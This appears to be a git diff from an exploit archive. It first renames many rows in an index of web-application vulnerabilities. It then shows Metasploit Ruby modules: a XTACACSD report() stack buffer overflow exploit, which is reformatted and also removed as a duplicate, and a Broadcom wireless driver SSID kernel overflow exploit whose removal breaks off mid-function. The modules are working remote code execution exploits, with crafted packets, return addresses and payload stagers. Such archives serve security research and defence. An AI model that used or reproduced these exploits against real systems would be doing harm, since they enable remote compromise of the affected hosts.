Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 @@ -23617,7 +23596,7 @@ id,file,description,date,author,platform,type,port 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13785,platforms/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 -13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 +13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (1)",2010-06-09,Sid3^effects,php,webapps,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0 @@ -24006,7 +23985,7 @@ id,file,description,date,author,platform,type,port 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0 14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0 -14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0 +14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection (2)",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - 'ecard.php' SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 @@ -25103,7 +25082,7 @@ id,file,description,date,author,platform,type,port 17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps,0 -17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 +17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (1)",2011-08-17,v3n0m,php,webapps,0 17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17678,platforms/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 @@ -25408,7 +25387,7 @@ id,file,description,date,author,platform,type,port 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 -18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 +18330,platforms/php/webapps/18330.txt,"WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0 @@ -25580,7 +25559,7 @@ id,file,description,date,author,platform,type,port 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18728,platforms/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 -18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0 +18732,platforms/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",php,webapps,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 18741,platforms/php/webapps/18741.txt,"Joomla! Component 'com_ponygallery' - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 @@ -26539,8 +26518,8 @@ id,file,description,date,author,platform,type,port 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0 -22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 -22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 +22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 +22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0 22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0 22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 - Information Disclosure",2003-07-14,JackDaniels,php,webapps,0 @@ -26698,7 +26677,7 @@ id,file,description,date,author,platform,type,port 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 -23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0 +23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 23381,platforms/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",php,webapps,0 @@ -27589,8 +27568,8 @@ id,file,description,date,author,platform,type,port 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 -25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 -25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 +25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 +25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0 @@ -30369,7 +30348,7 @@ id,file,description,date,author,platform,type,port 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28959,platforms/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 @@ -30477,7 +30456,7 @@ id,file,description,date,author,platform,type,port 29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29090,platforms/asp/webapps/29090.txt,"Active News Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29090,platforms/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 @@ -32856,7 +32835,7 @@ id,file,description,date,author,platform,type,port 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,php,webapps,0 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 -32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 +32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass (1)",2014-04-14,"Yassin Aboukir",hardware,webapps,0 32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 @@ -33510,7 +33489,7 @@ id,file,description,date,author,platform,type,port 34107,platforms/php/webapps/34107.txt,"BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0 -34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 +34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 @@ -36236,7 +36215,7 @@ id,file,description,date,author,platform,type,port 38548,platforms/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0 38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR / QNAP NAS - Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps,0 38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0 -38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 +38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass (2)",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 @@ -36799,7 +36778,7 @@ id,file,description,date,author,platform,type,port 39798,platforms/hardware/webapps/39798.txt,"Multiple JVC HDRs and Net Cameras - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 +39808,platforms/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues",2016-05-12,"Google Security Research",windows,webapps,37848 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0 @@ -36870,7 +36849,7 @@ id,file,description,date,author,platform,type,port 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 39969,platforms/php/webapps/39969.php,"WordPress Plugin Gravity Forms 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 -39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)",2016-06-17,"Paolo Massenio",php,webapps,80 +39971,platforms/php/webapps/39971.php,"phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 @@ -37644,7 +37623,6 @@ id,file,description,date,author,platform,type,port 41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0 41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0 41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0 -41678,platforms/linux/webapps/41678.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-01,Metasploit,linux,webapps,0 41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0 41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0 41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0 diff --git a/platforms/bsd/remote/10035.rb b/platforms/bsd/remote/10035.rb index 5ef6a7e21..8d6765597 100755 --- a/platforms/bsd/remote/10035.rb +++ b/platforms/bsd/remote/10035.rb @@ -1,9 +1,9 @@ ## -# $Id$ +# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,8 +11,8 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Brute @@ -21,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in XTACACSD <= 4.1.2. By - sending a specially crafted XTACACS packet with an overly long - username, an attacker may be able to execute arbitrary code. + This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By + sending a specially crafted XTACACS packet with an overly long + username, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', - 'References' => - [ + 'Version' => '$Revision: 9262 $', + 'References' => + [ ['CVE', '2008-7232'], ['OSVDB', '58140'], ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'], @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'BSD', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, 'Targets' => [ ['FreeBSD 6.2-Release Bruteforce', @@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 8 2008')) - register_options([Opt::RPORT(49)], self.class) - + register_options([Opt::RPORT(49)], self.class) end def brute_exploit(address) @@ -80,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x00\x00\x00\x00" # Result 2 sploit << "\x00\x00" # Result 3 sploit << make_nops(238 - payload.encoded.length) - sploit << payload.encoded + [address['Ret']].pack('V') + sploit << payload.encoded + [address['Ret']].pack('V') - print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") + print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/platforms/freebsd/remote/16879.rb b/platforms/freebsd/remote/16879.rb deleted file mode 100755 index 8d6765597..000000000 --- a/platforms/freebsd/remote/16879.rb +++ /dev/null @@ -1,90 +0,0 @@ -## -# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::Udp - include Msf::Exploit::Brute - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By - sending a specially crafted XTACACS packet with an overly long - username, an attacker may be able to execute arbitrary code. - }, - 'Author' => 'MC', - 'Version' => '$Revision: 9262 $', - 'References' => - [ - ['CVE', '2008-7232'], - ['OSVDB', '58140'], - ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'], - ], - 'Payload' => - { - 'Space' => 175, - 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20", - 'StackAdjustment' => -3500, - 'PrependEncoder' => "\x83\xec\x7f", - 'DisableNops' => 'True', - }, - 'Platform' => 'BSD', - 'Arch' => ARCH_X86, - 'Targets' => - [ - ['FreeBSD 6.2-Release Bruteforce', - {'Bruteforce' => - { - 'Start' => { 'Ret' => 0xbfbfea00 }, - 'Stop' => { 'Ret' => 0xbfbfef00 }, - 'Step' => 24, - } - }, - ], - ], - 'Privileged' => true, - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 8 2008')) - - register_options([Opt::RPORT(49)], self.class) - end - - def brute_exploit(address) - connect_udp - - sploit = "\x80" # Version - sploit << "\x05" # Type: Connect - sploit << "\xff\xff" # Nonce - sploit << "\xff" # Username length - sploit << "\x00" # Password length - sploit << "\x00" # Response - sploit << "\x00" # Reason - sploit << "\xff\xff\xff\xff" # Result 1 - sploit << "\xff\xff\xff\xff" # Destination address - sploit << "\xff\xff" # Destination port - sploit << "\xff\xff" # Line - sploit << "\x00\x00\x00\x00" # Result 2 - sploit << "\x00\x00" # Result 3 - sploit << make_nops(238 - payload.encoded.length) - sploit << payload.encoded + [address['Ret']].pack('V') - - print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") - udp_sock.put(sploit) - - disconnect_udp - end - -end diff --git a/platforms/hardware/remote/16387.rb b/platforms/hardware/remote/16387.rb deleted file mode 100755 index 8e74910e8..000000000 --- a/platforms/hardware/remote/16387.rb +++ /dev/null @@ -1,206 +0,0 @@ -## -# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan - 'skape', # windows kernel ninjitsu and debugging - 'hdm' # porting the C version to ruby - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9669 $', - 'References' => - [ - ['CVE', '2006-5882'], - ['OSVDB', '30294'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500 - }, - 'Platform' => 'win', - 'Targets' => - [ - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - - } - } - } - ], - - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 11 2006' - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - - print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - - select(nil, nil, nil, 0.02) - wifi.write(create_response) - - select(nil, nil, nil, 0.01) - wifi.write(create_beacon) - - break if session_created? - - end - - print_status("Finished sending frames...") - end - - def create_beacon - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton('FF:FF:FF:FF:FF:FF') - seq = [Time.now.to_i % 4096].pack('n') - - blob = create_frame - blob[0,1] = 0x80.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src - blob[22,2] = seq - - blob - end - - def create_response - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton(datastore['ADDR_DST']) - seq = [Time.now.to_i % 256].pack('n') - - blob = create_frame - blob[0,1] = 0x50.chr - blob[4,6] = 